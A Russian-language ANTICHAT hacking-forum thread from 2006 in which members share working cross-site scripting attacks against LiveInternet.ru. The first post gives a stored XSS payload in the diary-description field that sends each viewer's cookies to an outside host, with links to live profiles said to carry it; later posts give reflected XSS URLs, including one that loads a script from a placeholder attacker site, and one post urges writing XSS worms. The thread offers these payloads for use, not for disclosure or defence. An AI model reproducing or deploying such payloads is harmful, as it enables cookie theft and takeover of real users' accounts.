HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS в дневнике LiveInternet.ru
  #1  
Старый 13.12.2006, 12:10
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами: 10358246

Репутация: 378
Arrow XSS в дневнике LiveInternet.ru

Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах"
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт.
 
Ответить с цитированием

  #2  
Старый 13.12.2006, 19:30
-FARAON2005RAMSES-
Познающий
Регистрация: 06.10.2006
Сообщений: 59
С нами: 10312978

Репутация: 9
По умолчанию

О! санкс! всё пашет!
 
Ответить с цитированием

  #3  
Старый 13.12.2006, 19:34
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

да..+ тебе )))
хотя уже пол года назад знал.....там ваще админы тупят...
 
Ответить с цитированием

  #4  
Старый 14.12.2006, 19:23
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию

http://www.liveinternet.ru/journal_register.php
Поле:*Подтвердить пароль:
не фильтруется!
 
Ответить с цитированием

  #5  
Старый 14.12.2006, 20:06
†Romi4†
Постоянный
Регистрация: 06.02.2006
Сообщений: 409
С нами: 10662086

Репутация: 555
По умолчанию

)) прикольно,лови +
 
Ответить с цитированием

  #6  
Старый 15.12.2006, 02:54
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
С нами: 10483586

Репутация: 1223


По умолчанию

Туплю, не нашел этот пункт
Именно где он? Я по новой не регился, я именно хотел бы узнать где он в настройках, + у других в пофиле такого тоже не увидел, Черт не дружу я с таких типов сайтами

Последний раз редактировалось Sandjuro; 15.12.2006 в 02:56..
 
Ответить с цитированием

  #7  
Старый 22.12.2006, 16:50
-FARAON2005RAMSES-
Познающий
Регистрация: 06.10.2006
Сообщений: 59
С нами: 10312978

Репутация: 9
По умолчанию

именно поэтому ты и не нашёл этот пунктик.
Надо региться заного, тогда найдёшь.
 
Ответить с цитированием

  #8  
Старый 22.12.2006, 19:20
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
С нами: 11156006

Репутация: 749


По умолчанию

Пишите Xss вирус =) Мой для ливжурнала помог пользователям получить красивые доменчики третего уровня для своих ЖЖ =)
 
Ответить с цитированием

  #9  
Старый 22.12.2006, 20:37
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
С нами: 10227581

Репутация: 175
По умолчанию

http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorde r=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0

Пассивная ХSS почти там же!
 
Ответить с цитированием

  #10  
Старый 28.12.2006, 12:52
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
С нами: 10371202

Репутация: 341
По умолчанию

PASSIVE XSS при реге счетчиков
http://www.liveinternet.ru/add/add/?rules=agreed&www=&type=site&random=1113854391&url =http%3A%2F%2Flalala.2u2r%2F&aliases=&name="><scri pt src=http://ТВОЙСАЙТ.ru/js.js></script>&email=123%40123.123&password=mikmik&check= mikmik&keywords=&private=&subscribe=on&group=ru&gr oup=ru%2Fauto&ok=+%E4%E0%EB%FC%F8%E5+%3E%3E+
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Веб-уязвимости 519 23.09.2021 11:44
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
XSS worms Xex Статьи 0 02.10.2006 01:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...